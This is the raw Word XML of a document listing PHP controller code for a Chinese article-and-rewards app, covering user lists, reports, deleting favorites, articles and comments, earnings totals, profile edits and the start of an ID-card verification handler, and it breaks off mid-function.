    <w:p w14:paraId="63F967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1F17B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80900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举报成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C63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69EE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DE6AC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583D9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0E3FF8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724CE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0D37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1BC2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F9E1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userList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4380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9D4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input('param.pages/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F79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3277C8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385314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3D38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55B3A1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$pages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67580E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41E1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5265B3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2A16F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262C76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2D34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3B54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33FB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$where['a.hide'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CED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102F0D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['__ARTICLE__ w', 'a.id=w.uid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783131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463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Db::name('member')-&gt;where($where)-&gt;alias('a')-&gt;join($join)-&gt;field('a.id')-&gt;group('w.uid')-&gt;order('a.id desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3474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16642E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_user($v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4B67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13DC26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7FC3DC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$data['data'][$k]['qianming'] = $user['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F533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$data['data'][$k]['guanzhu'] = Db::name('member_guanzhu')-&gt;where(['uid' =&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$this-&gt;memberId, 'gz_uid' =&gt; $user['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB57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21F0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B1F23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B19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yjfk()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72C0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5C3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input('param.pages/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623DA7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72611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'number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12061B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564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AF228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=&gt; $pages,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370208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FD31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036678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D1F61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07F9A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0FEF6E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811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2E3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$this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BBEC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Db::name('jubao')-&gt;where($where)-&gt;order('id desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6122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0879C2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_user($v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4233A7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$data['data'][$k]['img'] = $user['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA5F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 = date('m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0C81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$data['data'][$k]['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CB7C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830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CEFDB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B6CF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sclsDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845C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7C9F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 ? input('id') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF406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input('type/d') ? input('type/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA69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0D75A2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=&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F994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BA4A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76CDA6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=&gt; $id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A693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A91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31C316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436B7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623A06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67280B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48A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0CCF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$ids = explode(',', $id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0291DB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30987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($ids as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645146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Db::name('member_favorite')-&gt;where(['uid' =&gt; $uid, 'aid' =&gt; $v, 'type' =&gt; $type])-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D13C0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echo 'db:' . $db . '  |  id:' . $v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D210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C9E5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7EB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guanzhuzan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4B28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4B04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6D072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$gz_uid = input('gz_uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47670B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input('aid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573640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(!$aid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57446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759ACC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A879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$data['guanzhu'] = DB::name('member_guanzhu')-&gt;where(['uid' =&gt; $uid, 'gz_uid' =&gt; $gz_uid])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304FD4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$data['zan'] = Db::name('article_zan')-&gt;where(['aid' =&gt; $aid, 'uid' =&gt; $uid])-&gt;value('zan');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019C2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FD533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1C34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weitoutiaoDel()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021ED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58BF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$this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BEC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input('aid/d') ? input('aid/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3FBA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$aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D305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 = $uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C92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Db::name('article')-&gt;where($where)-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590B6D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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266ABC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_records($uid, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除文章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$aid . ',</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE8C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426DB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删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C942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1B05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4A91E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_records($uid, '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $aid . ',</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B5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896ED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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C1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4CD54E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3FBD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5FF2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EAD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jindu_view()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD90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977A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$where['a.uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484833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$where['a.content'] = ['like', '%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阅读收益</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E20F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3F79ED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['__MEMBER__ b', 'a.uid = b.id'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43976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1696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Db::name('yaoqing_records')-&gt;alias('a')-&gt;join($join)-&gt;where($where)-&gt;whereTime('a.time', 'today')-&gt;order('a.time desc')-&gt;field('a.money,a.content,a.time,a.type,b.mobile,b.nickname,a.data,b.id')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EC1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006348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$data[$k]['username'] = _username($v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE913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$data[$k]['time'] = date('Y-m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378CEE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$data[$k]['content'] = $v['content'] . (!$v['data'] ? '&lt;b class="sx-jia"&gt;+' : '&lt;b class="sx-jian"&gt;-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>') . ($v['type'] ? $v['money'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' : _money($v['money']) . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>') . '&lt;/b&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B8F4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94C3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$num['uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04191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$num['content'] = ['like', '%</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阅读收益</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E921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$num['type'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C2B8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$num_jinbi = Db::name('yaoqing_records')-&gt;where($num)-&gt;whereTime('time', 'today')-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043EF9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$num['type'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F031E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$num_money = Db::name('yaoqing_records')-&gt;where($num)-&gt;whereTime('time', 'today')-&gt;sum('money');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A478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['data' =&gt; $data, 'num_money' =&gt; _money($num_money), 'num_jinbi' =&gt; $num_jinbi];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B514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1AD11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B3DF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comment()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C906D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C324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$limit = input('limit/d') ? input('limit/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6862C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Db::name('article_ping')-&gt;where(['aid_uid' =&gt; $this-&gt;memberId])-&gt;order('id desc')-&gt;fetchSql(false)-&gt;paginate($limit)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE5CC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($data['data'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD84F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 = _user($v['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6AA1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$uid_user['id'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBD7E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$uid_user['img'] = $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB99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$uid_user['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1525B2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$data['data'][$k]['uid_user'] = $uid_user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624E53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 = Db::name('article')-&gt;field('id,title,mychannel,image,images,video,content,description,content,update_time')-&gt;cache(true)-&gt;find($v['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8F0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7632CF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(!$article['image']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648E1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($article['mychannel'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F041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preg_match_all("/img src=\"(.*?)\"/", $article['content'], $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003B4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(count($img[1])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792115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 = $img[1][0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053CD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(strpos($va, 'http') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093436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$va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CAE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(strpos($va, '/public/uploads/us/') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5801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$config['url'] . $va;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41449E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00942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$va . '?imageView2/1/w/172/h/120';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA7F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8996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706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($article['mychannel'] == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A2F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$imagsjson = json_decode($article['images'], true) ? json_decode($article['images'], true) : json_decode(htmlspecialchars_decode($article['images']), true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D5C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(count($imagsjson)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34107C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(!empty($imagsjson[0]['img']) ? $imagsjson[0]['img'] : $imagsjson[0]) . '?imageView2/1/w/172/h/120';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779601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D367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if ($article['mychannel'] == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5939C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($article['video']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CE8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$article['video'] . </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>'?vframe/jpg/offset/2/w/172/h/120/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A64F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4DEE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D148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(empty($image)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD53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config()['appConfig']['url'] . '/public/style/index/img/images.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEAD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A0BC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E7972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 = _imgUrl() . $article['image'] . '?imageView2/1/w/172/h/120';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423BB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D97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$article['image'] = $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17821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unset($article['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E807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$data['data'][$k]['article'] = $article;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04715D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$data['data'][$k]['url'] = url('article/view', ['id' =&gt; $v['aid']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C09AD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$data['data'][$k]['time'] = _time($v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A56D1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$data['data'][$k]['huifu'] = Db::name('article_ping_xia')-&gt;where(['ping_id' =&gt; $v['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA2B2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B77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D8FE6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853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ping_del()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671B5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51E6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 ? input('id/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580CAC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793B24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CF4E9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评论</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0AB425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BFC44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DE76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7A4B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABD58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$this-&gt;memberId])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D033E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60772D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-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5728F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5A15EC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161ED6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删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C6F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F6DD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A9C7A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01EE0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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA162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79550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7DF2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DA8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7D08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ping_xia_del()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CBF7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D3E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 ? input('id/d') : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609161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(!$id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444AED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9943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追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175AD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13697D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F11F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D4499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Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD39C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-&gt;where(['uid' =&gt; $this-&gt;memberId])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6028D4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-&gt;where(['id', $id])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1964EE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-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5015F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7624B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92E99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删除成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCE2F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F3A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1396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1D84A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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B450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D8E2B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217C2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9C34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9397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info_username()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143956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B7D3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 input('param.nickname', '', 'strip_tags') ? input('param.nickname', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054CCE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$qianming = input('param.qianming', '', 'strip_tags') ? input('param.qianming', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9FCD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03897D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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>昵称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|max:20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAEEF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'qianming|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>签名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|max:250',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E31E4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06FE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266AA3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=&gt; $nickname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A28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'qianming' =&gt; $qianming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B767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05F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6F6DFA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921FB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57B11E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40EE89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2671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D82A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Db::name('member')-&gt;where('id', $this-&gt;memberId)-&gt;update(['nickname' =&gt; $nickname, 'qianming' =&gt; $qianming]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC5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4A5C3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EEB5F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修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B09E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BD1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0F36A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545AB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修改失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD66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18DC4F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EF8E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33C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874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sfz()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DEC0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8C2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$xingming = input('param.xingming', '', 'strip_tags') ? input('param.xingming', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E7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$sfz = input('param.sfz', '', 'strip_tags') ? input('param.sfz', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E4B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$sfz_shou = input('param.sfz_shou', '', 'strip_tags') ? input('param.sfz_shou', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C176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$sfz_zheng = input('param.img_zheng', '', 'strip_tags') ? input('param.img_zheng', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDFD7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A38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'xingming|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>姓名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|length:1,10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70080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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>身份证</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|length:14,20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6EF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'sfz_shou|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手持身份证</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC35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'sfz_zheng|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>身份证正面</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCF8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9789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$validata = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677FA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'xingming' =&gt; $xingming,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F87B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 =&gt; $sfz,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029E96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'sfz_shou' =&gt; $sfz_shou,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDDD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'sfz_zheng' =&gt; $sfz_zheng,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E373F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932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(!$validate-&gt;check($validata)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F424A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D2843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$validate-&gt;getError(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAB0C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202,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907E2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853D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868E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($this-&gt;member['sfz'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D14AB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CFE4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实名认证已通过，无需重复提交</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
